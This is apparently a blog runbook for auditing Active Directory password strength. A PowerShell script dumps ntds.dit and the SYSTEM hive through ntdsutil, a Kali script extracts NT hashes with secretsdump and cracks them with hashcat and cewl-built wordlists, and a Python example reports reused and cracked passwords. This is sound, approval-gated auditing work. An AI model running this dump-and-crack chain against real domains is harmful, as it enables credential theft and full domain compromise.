
Scripting : Password Audits (NTDS Extract/Kali Runbook)



This is a partially automated password audit runbook, so there are two scripts. The first is a set of Windows PowerShell commands that pulls the NTDS database (ntds.dit plus the SYSTEM registry hive) out of AD DS using an IFM backup.

The second script is run from your Kali server and does the actual auditing of the extracted password hashes.

Warning : Yes, audit in this scenario is another way of saying crack/hack, which is why you should always make sure you have security and HR approval before attempting this.

On the Kali device you will need to ensure you have the following folder structure created:

/opt/ntds_process/
├── input/           # Place ntds.dit and SYSTEM here
├── output/          # Processed results will be saved here
├── wordlists/       # Created by the script; generated wordlists are written here
├── rules/           # Created by the script; the combined hashcat rule file is written here
└── process-ntds.sh  # The bash script

When the Windows script has completed successfully, copy ntds.dit (from the "Active Directory" folder of the IFM backup) and SYSTEM (from the "registry" folder) into /opt/ntds_process/input/ on the Kali device.

Create the script in the location marked above, then make it executable with the command:

chmod +x process-ntds.sh

Windows Script - ntdsbackup.ps1

# ====================
# Windows PowerShell Script (ntdsbackup.ps1)
# Must be run as Domain Admin/Enterprise Admin from an elevated prompt on a domain controller
# ====================
#Requires -RunAsAdministrator

$ErrorActionPreference = 'Stop'
$timestamp  = Get-Date -Format "yyyyMMdd_HHmmss"
$backupPath = "C:\Loot\AD_backup_$timestamp"

# Create only the parent directory; ntdsutil creates the IFM folder itself
New-Item -ItemType Directory -Force -Path (Split-Path $backupPath -Parent) | Out-Null

# Run ntdsutil: each quoted argument is one command typed at the ntdsutil prompt
ntdsutil.exe "activate instance ntds" "ifm" "create full $backupPath" "quit" "quit"
if ($LASTEXITCODE -ne 0) {
    Write-Error "ntdsutil failed with exit code $LASTEXITCODE"
    exit $LASTEXITCODE
}

Write-Host "IFM backup created at: $backupPath"
Write-Host "Next steps:"
Write-Host "1. Copy ntds.dit from $backupPath\Active Directory"
Write-Host "2. Copy the SYSTEM hive (and SECURITY, if wanted) from $backupPath\registry"
Write-Host "3. Transfer to Linux machine at /opt/ntds_process/input/"

Kali Script : process-ntds.sh

#!/bin/bash
# ====================
# Linux Bash Script (process-ntds.sh)
# ====================

# Directory Structure
BASE_DIR="/opt/ntds_process"
INPUT_DIR="$BASE_DIR/input"
OUTPUT_DIR="$BASE_DIR/output"
WORDLIST_DIR="$BASE_DIR/wordlists"
RULES_DIR="$BASE_DIR/rules"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

# Create directories
for dir in "$INPUT_DIR" "$OUTPUT_DIR" "$WORDLIST_DIR" "$RULES_DIR"; do
    mkdir -p "$dir"
done

# Default paths (Kali ships rockyou compressed; unpack it once if only the .gz exists)
DEFAULT_WORDLIST="/usr/share/wordlists/rockyou.txt"
HASHCAT_RULES="/usr/share/hashcat/rules"
if [ ! -f "$DEFAULT_WORDLIST" ] && [ -f "$DEFAULT_WORDLIST.gz" ]; then
    gunzip -k "$DEFAULT_WORDLIST.gz"
fi

# Kali installs impacket's secretsdump as impacket-secretsdump; fall back to the pip name
SECRETSDUMP=$(command -v impacket-secretsdump || command -v secretsdump.py)
if [ -z "$SECRETSDUMP" ]; then
    echo "Error: impacket secretsdump not found in PATH"
    exit 1
fi

# Function: Custom wordlist generation
generate_custom_wordlist() {
    echo "Enter target websites for custom wordlist generation (one per line, empty line to finish):"
    echo "Suggested categories:"
    echo "1. Company public websites"
    echo "2. Product documentation"
    echo "3. Public GitHub repositories"
    echo "4. Company blogs"
    echo "5. Press releases"
    websites=()
    while IFS= read -r line; do
        [[ -z "$line" ]] && break
        websites+=("$line")
    done
    for site in "${websites[@]}"; do
        safe_name=$(printf '%s' "$site" | sed 's/[^a-zA-Z0-9]/_/g')
        cewl -d 2 -m 5 --with-numbers "$site" -w "$WORDLIST_DIR/cewl_${safe_name}.txt"
    done

    # Combine and add suffix variations; fall back to the default wordlist if no sites were given
    if compgen -G "$WORDLIST_DIR/cewl_*" > /dev/null; then
        cat "$WORDLIST_DIR"/cewl_* > "$WORDLIST_DIR/combined_cewl.txt"
        for suffix in 123 2023 2024; do
            sed "s/$/$suffix/" "$WORDLIST_DIR/combined_cewl.txt" > "$WORDLIST_DIR/with_$suffix.txt"
        done
        # Include the unsuffixed cewl words as well as the suffixed variants
        cat "$WORDLIST_DIR/combined_cewl.txt" "$WORDLIST_DIR"/with_* "$DEFAULT_WORDLIST" \
            | sort -u > "$WORDLIST_DIR/final_wordlist.txt"
    else
        cp "$DEFAULT_WORDLIST" "$WORDLIST_DIR/final_wordlist.txt"
    fi
}

# Function: Generate rule combinations (dive.rule is very large, so expect long runs)
generate_rules() {
    cat "$HASHCAT_RULES/best64.rule" \
        "$HASHCAT_RULES/d3ad0ne.rule" \
        "$HASHCAT_RULES/dive.rule" \
        > "$RULES_DIR/combined_rules.rule"
}

# Check input files
if [ ! -f "$INPUT_DIR/ntds.dit" ] || [ ! -f "$INPUT_DIR/SYSTEM" ]; then
    echo "Error: Required input files not found in $INPUT_DIR"
    echo "Expected files from Windows IFM backup:"
    echo "- ntds.dit"
    echo "- SYSTEM"
    exit 1
fi

# Main process
echo "Starting NTDS processing..."

# Generate wordlists and rules
generate_custom_wordlist
generate_rules

# Extract hashes. secretsdump writes ${OUTPUT_BASE}.ntds with one line per account in the
# form domain\user:rid:lmhash:nthash:::, plus .ntds.kerberos (Kerberos keys) and .ntds.cleartext.
# The NT hash is the 4th colon-separated field of the .ntds file.
OUTPUT_BASE="$OUTPUT_DIR/hashes_$TIMESTAMP"
"$SECRETSDUMP" -system "$INPUT_DIR/SYSTEM" -ntds "$INPUT_DIR/ntds.dit" LOCAL -outputfile "$OUTPUT_BASE"
cut -d: -f4 "${OUTPUT_BASE}.ntds" | grep -E '^[0-9a-f]{32}$' | sort -u > "${OUTPUT_BASE}.ntlm"

# Crack hashes (hashcat mode 1000 = NTLM, i.e. the stored NT hash; NTLMv1 challenge/response is mode 5500)
hashcat_modes=(1000)
for mode in "${hashcat_modes[@]}"; do
    echo "Running hashcat mode $mode..."
    hashcat -m "$mode" -a 0 "${OUTPUT_BASE}.ntlm" \
        "$WORDLIST_DIR/final_wordlist.txt" \
        -r "$RULES_DIR/combined_rules.rule" \
        --outfile "${OUTPUT_BASE}_mode${mode}.cracked"
done
echo "Processing complete. Check results in $OUTPUT_DIR (hash-to-user mapping is in ${OUTPUT_BASE}.ntds)"
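Once the Kali script has run, the raw outputs still have to be turned into audit findings. The following is an added example (not one of the runbook's scripts) that joins secretsdump's <outputfile>.ntds file with hashcat's --outfile and reports cracked accounts, accounts sharing the same NT hash, and password shape, without copying any plaintext into the report. It assumes the secretsdump line format domain\user:rid:lmhash:nthash::: and hashcat's default outfile format hash:plaintext; the sample lines and hashes below are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of secretsdump's <outputfile>.ntds lines: domain\user:rid:lmhash:nthash:::
NTDS_SAMPLE = """\
corp.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
corp.local\\alice:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.local\\bob:1106:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.local\\svc_backup:1110:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
WS01$:1200:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""
# Constructed sample of hashcat's --outfile (default outfile format: hash:plaintext)
CRACKED_SAMPLE = """\
11111111111111111111111111111111:Summer2024
22222222222222222222222222222222:svc_backup123
"""
NTDS_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)

def parse_ntds(text):
    """Map each user account to its NT hash; machine accounts (trailing $) are skipped."""
    accounts = {}
    for line in text.splitlines():
        m = NTDS_RE.match(line.strip())
        if m and not m["user"].endswith("$"):
            accounts[m["user"]] = m["nt"].lower()
    return accounts

def parse_cracked(text):
    """Map NT hash -> plaintext from hashcat's outfile."""
    return {h.lower(): pw for h, _, pw in (ln.partition(":") for ln in text.splitlines()) if h}

def describe(pw, user):
    """Findings about a cracked password that can go in a report without the plaintext itself."""
    short = user.rsplit("\\", 1)[-1].lower()
    pattern = re.sub(r"\d", "d", re.sub(r"[a-z]", "l", re.sub(r"[A-Z]", "U", pw)))
    return {"length": len(pw), "contains_username": short in pw.lower(), "pattern": pattern}

def audit(accounts, cracked):
    """Per-user findings, groups of accounts sharing one NT hash (password reuse), and totals."""
    by_hash = defaultdict(list)
    for user, nt in accounts.items():
        by_hash[nt].append(user)
    findings = {u: describe(cracked[nt], u) for u, nt in accounts.items() if nt in cracked}
    shared = [sorted(users) for users in by_hash.values() if len(users) > 1]
    return {"cracked": findings, "shared": shared,
            "summary": {"total": len(accounts), "cracked": len(findings), "reuse_groups": len(shared)}}

if __name__ == "__main__":
    print(audit(parse_ntds(NTDS_SAMPLE), parse_cracked(CRACKED_SAMPLE)))
```

Shared-hash groups are reported even when the password was not cracked, since identical NT hashes mean identical passwords regardless of whether hashcat recovered them.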

more to add here
